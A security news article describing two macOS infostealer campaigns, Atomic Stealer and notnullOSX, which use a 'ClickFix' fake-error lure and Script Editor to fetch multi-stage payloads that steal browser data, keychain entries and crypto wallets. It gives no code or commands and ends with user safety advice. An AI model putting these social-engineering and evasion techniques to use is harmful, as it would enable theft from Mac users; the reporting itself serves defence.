New Mac Malware Threats Bypass Apple Security
A new wave of sophisticated malware campaigns is converging on macOS, leveraging clever social engineering and novel technical methods to bypass Apple’s security measures. Security researchers have id
A new wave of sophisticated malware campaigns is converging on macOS, leveraging clever social engineering and novel technical methods to bypass Apple’s security measures. Security researchers have identified two distinct but thematically linked threats—the Atomic Stealer (AMOS) and a new Go-based infostealer dubbed notnullOSX—both employing a clever "ClickFix" social engineering lure. These campaigns represent a significant evolution in Mac threats, moving beyond simple malicious apps to exploit trusted system components and target high-value victims with surgical precision.
The ClickFix Social Engineering Ploy
At the heart of both campaigns is a social engineering tactic researchers have named "ClickFix." Potential victims are drawn in through advertisements, search engine results, or forum posts that promise a fix for a common software issue, such as "Unable to open" an application. The lure directs users to download a disk image file (.DMG).
Once the DMG is opened, the victim is presented with a fake error message claiming the application is damaged and cannot be opened. The message then instructs the user to run a provided "Fix" command using Script Editor, a legitimate Apple application, instead of the Terminal. This is a critical psychological trick: by avoiding the Terminal, which users often associate with risk, and using a less intimidating built-in app, the attackers lower the victim's guard. The script, when executed, silently fetches and installs the malware payload from a remote server.
Parallel Attack Paths and Technical Evasion
While the ClickFix lure is the common thread, the two campaigns demonstrate slightly different technical execution and final payloads, highlighting the adaptability of macOS attackers.
The campaign delivering Atomic Stealer is notable for its complete bypass of the Terminal. By using Script Editor to run an AppleScript (osascript) that executes a bash command, the malware chain avoids triggering suspicions associated with Terminal windows. This script downloads a second-stage payload, which is an unsigned macOS archive utility executable. This utility then decrypts and installs the final Atomic Stealer binary. This multi-stage process helps evade basic signature-based detection.
In parallel, the notnullOSX campaign uses the same ClickFix lure but also employs a secondary, more traditional attack path via directly malicious DMG files. The malware itself is written in Go, a cross-platform language increasingly popular with malware developers for its ease of compilation and anti-analysis benefits. Upon execution, notnullOSX performs extensive reconnaissance, checking the infected machine's language settings to avoid targeting systems in Russian or other Eastern European languages—a common tactic to avoid attracting law enforcement attention in those regions. It then systematically hunts for and exfiltrates data from over fifty browser profiles, cryptocurrency wallets (including Exodus, Atomic, and Binance), and keychain entries.
A Shift Towards Targeted Financial Theft
The objectives of these campaigns underscore a move towards financially motivated, targeted attacks on macOS users. Atomic Stealer is a known commodity designed to harvest passwords, cookies, financial data, and files. The notnullOSX campaign takes this a step further by explicitly targeting cryptocurrency holders. Evidence suggests the operators are scouring public blockchain data to identify wallets with balances exceeding $10,000 before launching their tailored attacks. The malware's specific wallet targeting and its avoidance of certain geographic regions indicate a professional, business-like approach to cybercrime focused on maximizing financial return while minimizing operational risk.
These attacks also signal a direct response to Apple's ongoing platform security enhancements, such as Gatekeeper and Notarization requirements. By abusing legitimate system tools like Script Editor and using multi-stage payloads with unsigned executables, attackers are finding cracks in the armor. The use of Go for notnullOSX also presents a challenge for security tools, as the language can produce binaries that are harder to analyze statically.
Key Takeaways
- Social engineering remains the primary vector. The "ClickFix" tactic is highly effective because it exploits a user's willingness to solve a common problem, using a non-threatening, built-in application (Script Editor) to execute malicious code.
- Attackers are innovating to bypass macOS defenses. The shift away from Terminal-based execution and the use of multi-stage payloads hosted remotely are direct countermeasures to Apple's security models and user education about Terminal dangers.
- macOS is increasingly in the crosshairs of financially motivated actors. The emergence of notnullOSX, with its explicit targeting of high-value crypto wallets, shows that Mac users are no longer just targets for adware but for serious, focused financial theft.
- Vigilance with downloads is critical. Users should be extremely wary of downloading "fix" tools from unofficial sources, regardless of how legitimate an error message may appear. Always obtain software directly from official vendors or the App Store.
